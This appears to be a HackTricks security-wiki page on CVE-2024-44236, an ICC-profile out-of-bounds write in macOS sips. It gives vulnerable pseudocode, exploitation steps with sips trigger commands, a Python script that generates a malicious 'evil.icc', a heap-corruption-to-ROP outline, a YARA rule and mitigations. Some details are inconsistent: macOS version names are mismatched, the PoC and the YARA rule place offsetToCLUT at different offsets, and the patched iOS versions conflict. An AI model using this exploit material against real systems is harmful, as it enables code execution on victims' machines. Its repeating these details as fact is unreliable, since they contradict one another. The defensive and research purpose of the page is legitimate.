WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overview

An out-of-bounds zero-write vulnerability in the ICC profile parser of Apple's macOS Scriptable Image Processing System (sips) (macOS 15.0.1, sips-307) allows an attacker to corrupt heap metadata and pivot that primitive into full code execution. The bug is in the handling of the offsetToCLUT field of the lutAToBType (mAB ) and lutBToAType (mBA ) tags. If an attacker sets offsetToCLUT == tagDataSize, the parser zeroes 16 bytes past the end of the heap buffer. With heap spraying, those zero writes can land on allocator structures or C++ pointers that are later dereferenced, yielding an arbitrary-write-to-exec chain (CVE-2024-44236, CVSS 7.8).

Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.

Vulnerable Code

```c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
// The check is off by 16: offsetToCLUT == tagDataSize passes, so the loop
// below starts writing exactly at the end of the allocation.
if (offsetToCLUT <= tagDataSize) {
    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0;            // no bounds check vs allocated size!
}
```

Exploitation Steps

  1. Craft a malicious .icc profile

    • Set up a minimal ICC header (acsp) and add one mAB (or mBA ) tag.
    • Configure the tag table so the offsetToCLUT equals the tag size (tagDataSize).
    • Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.
  2. Trigger parsing with any sips operation that touches the profile

    ```bash
    # verification path (no output file needed)
    sips --verifyColor evil.icc
    # or implicitly when converting images that embed the profile
    sips -s format png payload.jpg --out out.png
    ```

  3. Heap metadata corruption ➜ arbitrary write ➜ ROP
    On Apple’s default nano_zone allocator, metadata for 16-byte slots lives immediately after the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber meta->slot_B. After a subsequent free, the poisoned pointer is enqueued in the tiny free list, letting the attacker allocate a fake object at an arbitrary address and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.

Quick PoC generator (Python 3)

```python
#!/usr/bin/env python3
import struct, sys

HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
profile  = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                      # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
profile += mab

open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```

YARA detection rule

```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
        author       = "HackTricks"
    strings:
        $magic = { 61 63 73 70 }          // 'acsp' (ICC header signature, byte 36)
        $mab   = { 6D 41 42 20 }          // 'mAB '
        $mba   = { 6D 42 41 20 }          // 'mBA '
    condition:
        $magic at 36 and
        // tag table starts at 132: 12-byte entries of (signature, offset, size),
        // all big-endian; offsetToCLUT sits 24 bytes into the tag data
        for any i in (0 .. 10) :          // first 11 tag entries
            (
              ($mab at (132 + 12*i) or $mba at (132 + 12*i)) and
              uint32be(132 + 12*i + 4) + 28 <= filesize and               // tag data readable
              uint32be(uint32be(132 + 12*i + 4) + 24) == uint32be(132 + 12*i + 8) // offsetToCLUT == tagDataSize
            )
}
```

Impact

Opening or processing a crafted ICC profile leads to remote arbitrary code execution in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).

Detection & Mitigation

  • Patch! Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
  • Deploy the YARA rule above on email gateways and EDR solutions.
  • Strip or sanitise embedded ICC profiles with exiftool -icc_profile= -overwrite_original <file> before further processing on untrusted files.
  • Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.
  • For DFIR, look for recent execution of sips --verifyColor or ColorSync library loads by sandboxed apps in the unified log.

References

  • Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
    https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
  • Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”
    https://support.apple.com/en-us/HT213981
